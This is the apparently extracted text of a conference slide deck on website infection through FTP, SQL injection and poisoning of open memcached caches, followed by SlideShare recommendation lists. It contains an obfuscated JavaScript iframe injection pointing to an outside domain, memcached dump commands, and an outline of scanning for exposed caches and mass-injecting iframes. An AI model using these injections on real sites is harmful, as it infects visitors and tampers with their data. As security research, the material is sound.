[FTP|SQL|Cache] Injections

[FTP|SQL|Cache]
    Injections
   David Barroso
Head of Security Intelligence
  Telefonica Digital
ddddddasdfsdf
                      27%

                                73%




http://www.iframeinjectionattack.com/how-to-remove-this-site-may-harm-your-computer.html
Introduction

Cache basics

Demo

Summary
How can I infect a web?
Or, how can I forward visitors to a controlled webpage?




                                                          Pág. 4
MPack

          The attacker
          compromises a               Attacker
          website and injects                            The malcode
          an iFrame                                      connects back
                                                         to the C&C
                                                                         C&C

                                                     iFRAME

  Infection kit                  Servidor Web legítimo
                                 www.mydomain.com)


        The visitor is
        forwarded to an
        infection kit

                    The visitor browses a
                    normal website (with           User
                    a malicious iframe)
                                                                               Pág. 5
First option
Difficulty: easy




                   Pág. 6
Pág. 7
Pág. 8
SQL Injection
Difficulty: easy




                   Pág. 9
Pág. 10
Pág. 11
Pág. 12
Pág. 13
A tener en cuenta

 Which users do I want to infect?
    Focus your efforts
    Example: brazilian webpages
 SEO and web ranking
   Alexa Ranking
 It’s not only about infection
    Sometimes is only about web ranking
    Spam comments in blogs
    Playing with HTML entities(ex. <noscript>)


                                                     Pág. 14
                                                  Pág. 14
Second options
Difficulty: medium




                     Pág. 15
Pág. 16
Pág. 17
Pág. 18
Pág. 19
Pág. 20
Pág. 21
Choose your preferred
infection kit
99% LAMP: Linux + Apache + Mysql + PHP




                                         Pág. 22
Pág. 23
Pág. 24
Pág. 25
Pág. 26
Pág. 27
ddddddasdfsdf
 Simple: <iframe src=‘http://www.malicious.com’></iframe>

 Not so simple:

<Script Language='Javascript'>
          27%
          document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%6
                 73%
3%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%
61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D
%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67
%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6
C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%
6E%3A%61%62%73%6F%6C%75%74%65%20%3E%3C%2F%69%66%72%61%6D
%65%3E'));
</Script>
And how a web cache is
related?
Specifically: memcached




                          Pág. 29
ddddddasdfsdf
Cache
 A component that transparently stores data so that future
  requests for that data can be served faster. The data that is
  stored within a cache might be values that have been
  computed earlier or duplicates of original values that are
  stored27%
         elsewhere. (Wikipedia)

               73%
 Examples: CPU, Disk, DNS, ARP, etc.

 Main security attack: poisoning
ddddddasdfsdf
                      73%
                27%
ddddddasdfsdf
             Created on 2003 forLiveJournal
             Associative array(hash table)
             YouTube, Reddit, FaceBook,
              Orange, Twitter, etc.
27%          Memory-based
             Keys (250b), Values (1MB)
      73%    Default port: 11211/tcp

             No authentication
             Some caches are on the Internet
             Optional(not often used): SASL
ddddddasdfsdf
 Telnet based commands
 Commands
    Set (flags timeout bytes)
    Get
    Stats
        27%
        Items
        Cachedump
             73%
ddddddasdfsdf
 Sensepost analyzed the security issues back on 2010
 They developed go-derper.rb
    Identifcation
    Storage of k keys and values
    Regular expressiones
        27%
    It can overwrite existing keys and values
             73%
 Main problems
    Which web app is using these data?
    How can I find ‘interesting’ data?
[FTP|SQL|Cache] Injections
Infections

iFrame/JS malicious
injection




Confidential information

Passwords
Prices!
Let’s see some practical
stuff
Take care with all those memcached!




                                      Pág. 37
ddddddasdfsdf
Demo
 Memcached access
   27%
 Key/value storage
     73%
ddddddasdfsdf
 set FIRST 0 0 11
    Hello FIRST
 get FIRST

 stats items
        27%
 stats cachedump n 10
             73%
ddddddasdfsdf
Demo
 Overwriting values
   27%
 (iFrame – infection kit)
      73%
ddddddasdfsdf
 iFrame injection




        27%

              73%
ddddddasdfsdf
Demo
 Password sniffing
   27%
 Data mangling (prices)
      73%
ddddddasdfsdf
 Password sniffing




        27%

              73%
ddddddasdfsdf
 Data mangling (prices)




        27%

              73%
ddddddasdfsdf
 Data mangling (prices)




        27%

              73%
ddddddasdfsdf
              27%

                    73%




Source: http://www.sensepost.com/blog/4873.html
ddddddasdfsdf
 CacheT: an alternative to FTP-Toolz
  and SQL Injection Kitz

 go-derper.rb patch
 Proof of concept
         27%
 Once you find some memcached
  hosts(nmap) 73% entries
    Dump of all their
    Look for HTML data
    Malicious injection
      (iFrame/JavaScript)
 Not published yet (only malicious
  purposes)
ddddddasdfsdf
 Protect your memcached from external access
     Firewall
     Listen only to localhost
 We haven’t seen malicious infections using theses caches
     But it’s a very attractive asset, because many of the large
          27%
        websites are using it
     From the malicious point of view, it doesn’t mind if you don’t
               73%
        know which webapp is behind
 It’s very easy to code a tool scanning for open memcached (or
  similar caches) and then infect all of them
     nmap + go-derper.rb
Obrigado
David Barroso
   @lostinsecurity
1 of 49

Recommended

MMW Anti-Sandbox Techniques by
MMW Anti-Sandbox TechniquesMMW Anti-Sandbox Techniques
MMW Anti-Sandbox TechniquesCyphort
3K views45 slides
Malware Detection With Multiple Features by
Malware Detection With Multiple FeaturesMalware Detection With Multiple Features
Malware Detection With Multiple FeaturesMuhammad Najmi Ahmad Zabidi
2.5K views39 slides
Grails vs XSS: Defending Grails against XSS attacks by
Grails vs XSS: Defending Grails against XSS attacksGrails vs XSS: Defending Grails against XSS attacks
Grails vs XSS: Defending Grails against XSS attackstheratpack
2.5K views59 slides
Breaking the cyber kill chain! by
Breaking the cyber kill chain!Breaking the cyber kill chain!
Breaking the cyber kill chain!Nahidul Kibria
1.3K views45 slides
Crypto failures every developer should avoid by
Crypto failures every developer should avoidCrypto failures every developer should avoid
Crypto failures every developer should avoidFilip Šebesta
354 views47 slides
XSS Countermeasures in Grails by
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grailstheratpack
3.2K views114 slides

More Related Content

Viewers also liked

Lionel Denisefrench Contemporary Artist by
Lionel Denisefrench Contemporary ArtistLionel Denisefrench Contemporary Artist
Lionel Denisefrench Contemporary Artistlioneldenise
265 views4 slides
My Life: by Christopher Dyson by
My Life: by Christopher DysonMy Life: by Christopher Dyson
My Life: by Christopher DysonChristopher Dyson
248 views4 slides
Prezentarea oportunitatea cci by
Prezentarea oportunitatea cciPrezentarea oportunitatea cci
Prezentarea oportunitatea cciLuchian Liliana Carmen
110 views32 slides
Riesgos físicos by
Riesgos físicosRiesgos físicos
Riesgos físicosDAVLE
154 views11 slides
Knye journal-tpd2016 (2) by
Knye journal-tpd2016 (2)Knye journal-tpd2016 (2)
Knye journal-tpd2016 (2)Marisa Knye
128 views14 slides
Powertpointcontiempo by
PowertpointcontiempoPowertpointcontiempo
Powertpointcontiempolosinvestigadoresdelastic
74 views20 slides

Viewers also liked(17)

Lionel Denisefrench Contemporary Artist by lioneldenise
Lionel Denisefrench Contemporary ArtistLionel Denisefrench Contemporary Artist
Lionel Denisefrench Contemporary Artist
lioneldenise265 views
Riesgos físicos by DAVLE
Riesgos físicosRiesgos físicos
Riesgos físicos
DAVLE154 views
Knye journal-tpd2016 (2) by Marisa Knye
Knye journal-tpd2016 (2)Knye journal-tpd2016 (2)
Knye journal-tpd2016 (2)
Marisa Knye128 views
Cont_Perf_Improv_ws by Bill Hoberg
Cont_Perf_Improv_wsCont_Perf_Improv_ws
Cont_Perf_Improv_ws
Bill Hoberg162 views
Lemken smaragd 7-300 parts catalog by PartCatalogs Net
Lemken smaragd 7-300 parts catalog Lemken smaragd 7-300 parts catalog
Lemken smaragd 7-300 parts catalog
PartCatalogs Net1.2K views
KAP 업종별기술세미나 11년 4월 #02 by chasarang
KAP 업종별기술세미나 11년 4월 #02KAP 업종별기술세미나 11년 4월 #02
KAP 업종별기술세미나 11년 4월 #02
chasarang4.4K views
KAP 업종별기술세미나 02월 #1 by chasarang
KAP 업종별기술세미나 02월 #1KAP 업종별기술세미나 02월 #1
KAP 업종별기술세미나 02월 #1
chasarang2.6K views
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dos by David Barroso
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dosYersinia - Demostraciones prácticas de nuevos ataques de nivel dos
Yersinia - Demostraciones prácticas de nuevos ataques de nivel dos
David Barroso7.8K views

Similar to [FTP|SQL|Cache] Injections

Serverless Security: Defence Against the Dark Arts by
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsYan Cui
291 views173 slides
Minor Mistakes In Web Portals by
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portalsmsobiegraj
3.5K views97 slides
How to secure web applications by
How to secure web applicationsHow to secure web applications
How to secure web applicationsMohammed A. Imran
2K views51 slides
[ITAS.VN]CheckMarx-CxSuite-Sample result for webgoat5.3rc1 by
[ITAS.VN]CheckMarx-CxSuite-Sample result for webgoat5.3rc1[ITAS.VN]CheckMarx-CxSuite-Sample result for webgoat5.3rc1
[ITAS.VN]CheckMarx-CxSuite-Sample result for webgoat5.3rc1ITAS VIETNAM
29.3K views853 slides
Android Hacking by
Android HackingAndroid Hacking
Android Hackingantitree
9K views40 slides
Web Application Security by
Web Application SecurityWeb Application Security
Web Application SecuritySiarhei Barysiuk
1.8K views42 slides

Similar to [FTP|SQL|Cache] Injections(20)

Serverless Security: Defence Against the Dark Arts by Yan Cui
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
Yan Cui291 views
Minor Mistakes In Web Portals by msobiegraj
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
msobiegraj3.5K views
[ITAS.VN]CheckMarx-CxSuite-Sample result for webgoat5.3rc1 by ITAS VIETNAM
[ITAS.VN]CheckMarx-CxSuite-Sample result for webgoat5.3rc1[ITAS.VN]CheckMarx-CxSuite-Sample result for webgoat5.3rc1
[ITAS.VN]CheckMarx-CxSuite-Sample result for webgoat5.3rc1
ITAS VIETNAM29.3K views
Android Hacking by antitree
Android HackingAndroid Hacking
Android Hacking
antitree9K views
Java/Scala Lab 2016. Владимир Гарбуз: Написание безопасного кода на Java. by GeeksLab Odessa
Java/Scala Lab 2016. Владимир Гарбуз: Написание безопасного кода на Java.Java/Scala Lab 2016. Владимир Гарбуз: Написание безопасного кода на Java.
Java/Scala Lab 2016. Владимир Гарбуз: Написание безопасного кода на Java.
GeeksLab Odessa312 views
Vulnerabilities of machine learning infrastructure by Sergey Gordeychik
Vulnerabilities of machine learning infrastructureVulnerabilities of machine learning infrastructure
Vulnerabilities of machine learning infrastructure
Sergey Gordeychik346 views
Renaud Bido & Mohammad Shams - Hijacking web servers & clients by nooralmousa
Renaud Bido & Mohammad Shams - Hijacking web servers & clientsRenaud Bido & Mohammad Shams - Hijacking web servers & clients
Renaud Bido & Mohammad Shams - Hijacking web servers & clients
nooralmousa1.1K views
AktaionPPTv5_JZedits by Rod Soto
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZedits
Rod Soto540 views
Identity Providers-as-a-Service built as Cloud-of-Clouds: challenges and oppo... by Diego Kreutz
Identity Providers-as-a-Service built as Cloud-of-Clouds: challenges and oppo...Identity Providers-as-a-Service built as Cloud-of-Clouds: challenges and oppo...
Identity Providers-as-a-Service built as Cloud-of-Clouds: challenges and oppo...
Diego Kreutz505 views
Web Intrusion Detection by Abhishek Singh
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
Abhishek Singh2.7K views
Hardening Enterprise Apache by guestd9aa5
Hardening Enterprise ApacheHardening Enterprise Apache
Hardening Enterprise Apache
guestd9aa52.3K views
Hacking Client Side Insecurities by amiable_indian
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian2.5K views
TRISC 2010 - Grapevine , Texas by Aditya K Sood
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
Aditya K Sood525 views
Scaling Web 2.0 Malware Infection by Wayne Huang
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Wayne Huang1.4K views
Application and Website Security -- Fundamental Edition by Daniel Owens
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens1.5K views
The Top 10/20 Internet Security Vulnerabilities – A Primer by amiable_indian
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primer
amiable_indian7.9K views

More from David Barroso

El replanteamiento de la ciberseguridad by
El replanteamiento de la ciberseguridadEl replanteamiento de la ciberseguridad
El replanteamiento de la ciberseguridadDavid Barroso
602 views23 slides
OPSEC - Amanece que no es poco by
OPSEC - Amanece que no es pocoOPSEC - Amanece que no es poco
OPSEC - Amanece que no es pocoDavid Barroso
2.3K views65 slides
Infección en BIOS, UEFI y derivados by
Infección en BIOS, UEFI y derivadosInfección en BIOS, UEFI y derivados
Infección en BIOS, UEFI y derivadosDavid Barroso
2.7K views47 slides
En la época post-Snowden, ¿es la seguridad importante? by
En la época post-Snowden, ¿es la seguridad importante?En la época post-Snowden, ¿es la seguridad importante?
En la época post-Snowden, ¿es la seguridad importante?David Barroso
627 views59 slides
Ataques dirigidos contra activistas by
Ataques dirigidos contra activistasAtaques dirigidos contra activistas
Ataques dirigidos contra activistasDavid Barroso
1.3K views114 slides
Un gentil viaje al interior de las extorsiones mediante DDoS by
Un gentil viaje al interior de las extorsiones mediante DDoSUn gentil viaje al interior de las extorsiones mediante DDoS
Un gentil viaje al interior de las extorsiones mediante DDoSDavid Barroso
1.3K views63 slides

More from David Barroso(11)

El replanteamiento de la ciberseguridad by David Barroso
El replanteamiento de la ciberseguridadEl replanteamiento de la ciberseguridad
El replanteamiento de la ciberseguridad
David Barroso602 views
OPSEC - Amanece que no es poco by David Barroso
OPSEC - Amanece que no es pocoOPSEC - Amanece que no es poco
OPSEC - Amanece que no es poco
David Barroso2.3K views
Infección en BIOS, UEFI y derivados by David Barroso
Infección en BIOS, UEFI y derivadosInfección en BIOS, UEFI y derivados
Infección en BIOS, UEFI y derivados
David Barroso2.7K views
En la época post-Snowden, ¿es la seguridad importante? by David Barroso
En la época post-Snowden, ¿es la seguridad importante?En la época post-Snowden, ¿es la seguridad importante?
En la época post-Snowden, ¿es la seguridad importante?
David Barroso627 views
Ataques dirigidos contra activistas by David Barroso
Ataques dirigidos contra activistasAtaques dirigidos contra activistas
Ataques dirigidos contra activistas
David Barroso1.3K views
Un gentil viaje al interior de las extorsiones mediante DDoS by David Barroso
Un gentil viaje al interior de las extorsiones mediante DDoSUn gentil viaje al interior de las extorsiones mediante DDoS
Un gentil viaje al interior de las extorsiones mediante DDoS
David Barroso1.3K views
Common Browser Hijacking Methods by David Barroso
Common Browser Hijacking MethodsCommon Browser Hijacking Methods
Common Browser Hijacking Methods
David Barroso3.1K views
Recursos de la economía sumergida by David Barroso
Recursos de la economía sumergidaRecursos de la economía sumergida
Recursos de la economía sumergida
David Barroso347 views
Extorsiones mediante DDoS by David Barroso
Extorsiones mediante DDoSExtorsiones mediante DDoS
Extorsiones mediante DDoS
David Barroso750 views
Respuesta ágil ante incidentes by David Barroso
Respuesta ágil ante incidentesRespuesta ágil ante incidentes
Respuesta ágil ante incidentes
David Barroso632 views
iPhone + Botnets = Fun by David Barroso
iPhone + Botnets = FuniPhone + Botnets = Fun
iPhone + Botnets = Fun
David Barroso1.9K views

Recently uploaded

Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlue by
Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlueMigrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlue
Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlueShapeBlue
218 views20 slides
DRBD Deep Dive - Philipp Reisner - LINBIT by
DRBD Deep Dive - Philipp Reisner - LINBITDRBD Deep Dive - Philipp Reisner - LINBIT
DRBD Deep Dive - Philipp Reisner - LINBITShapeBlue
180 views21 slides
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti... by
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...ShapeBlue
139 views29 slides
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O... by
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...ShapeBlue
132 views13 slides
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ... by
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...ShapeBlue
126 views10 slides
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And... by
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...ShapeBlue
106 views12 slides

Recently uploaded(20)

Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlue by ShapeBlue
Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlueMigrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlue
Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlue
ShapeBlue218 views
DRBD Deep Dive - Philipp Reisner - LINBIT by ShapeBlue
DRBD Deep Dive - Philipp Reisner - LINBITDRBD Deep Dive - Philipp Reisner - LINBIT
DRBD Deep Dive - Philipp Reisner - LINBIT
ShapeBlue180 views
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti... by ShapeBlue
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
ShapeBlue139 views
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O... by ShapeBlue
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...
ShapeBlue132 views
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ... by ShapeBlue
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...
ShapeBlue126 views
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And... by ShapeBlue
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...
ShapeBlue106 views
Developments to CloudStack’s SDN ecosystem: Integration with VMWare NSX 4 - P... by ShapeBlue
Developments to CloudStack’s SDN ecosystem: Integration with VMWare NSX 4 - P...Developments to CloudStack’s SDN ecosystem: Integration with VMWare NSX 4 - P...
Developments to CloudStack’s SDN ecosystem: Integration with VMWare NSX 4 - P...
ShapeBlue194 views
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool by ShapeBlue
Extending KVM Host HA for Non-NFS Storage -  Alex Ivanov - StorPoolExtending KVM Host HA for Non-NFS Storage -  Alex Ivanov - StorPool
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool
ShapeBlue123 views
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit... by ShapeBlue
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...
ShapeBlue159 views
Confidence in CloudStack - Aron Wagner, Nathan Gleason - Americ by ShapeBlue
Confidence in CloudStack - Aron Wagner, Nathan Gleason - AmericConfidence in CloudStack - Aron Wagner, Nathan Gleason - Americ
Confidence in CloudStack - Aron Wagner, Nathan Gleason - Americ
ShapeBlue130 views
Backup and Disaster Recovery with CloudStack and StorPool - Workshop - Venko ... by ShapeBlue
Backup and Disaster Recovery with CloudStack and StorPool - Workshop - Venko ...Backup and Disaster Recovery with CloudStack and StorPool - Workshop - Venko ...
Backup and Disaster Recovery with CloudStack and StorPool - Workshop - Venko ...
ShapeBlue184 views
TrustArc Webinar - Managing Online Tracking Technology Vendors_ A Checklist f... by TrustArc
TrustArc Webinar - Managing Online Tracking Technology Vendors_ A Checklist f...TrustArc Webinar - Managing Online Tracking Technology Vendors_ A Checklist f...
TrustArc Webinar - Managing Online Tracking Technology Vendors_ A Checklist f...
TrustArc170 views
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue by ShapeBlue
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlueWhat’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue
ShapeBlue263 views
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT by ShapeBlue
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBITUpdates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT
ShapeBlue206 views
"Surviving highload with Node.js", Andrii Shumada by Fwdays
"Surviving highload with Node.js", Andrii Shumada "Surviving highload with Node.js", Andrii Shumada
"Surviving highload with Node.js", Andrii Shumada
Fwdays56 views
Why and How CloudStack at weSystems - Stephan Bienek - weSystems by ShapeBlue
Why and How CloudStack at weSystems - Stephan Bienek - weSystemsWhy and How CloudStack at weSystems - Stephan Bienek - weSystems
Why and How CloudStack at weSystems - Stephan Bienek - weSystems
ShapeBlue238 views
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N... by James Anderson
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
James Anderson160 views
Initiating and Advancing Your Strategic GIS Governance Strategy by Safe Software
Initiating and Advancing Your Strategic GIS Governance StrategyInitiating and Advancing Your Strategic GIS Governance Strategy
Initiating and Advancing Your Strategic GIS Governance Strategy
Safe Software176 views
Business Analyst Series 2023 - Week 4 Session 7 by DianaGray10
Business Analyst Series 2023 -  Week 4 Session 7Business Analyst Series 2023 -  Week 4 Session 7
Business Analyst Series 2023 - Week 4 Session 7
DianaGray10139 views

[FTP|SQL|Cache] Injections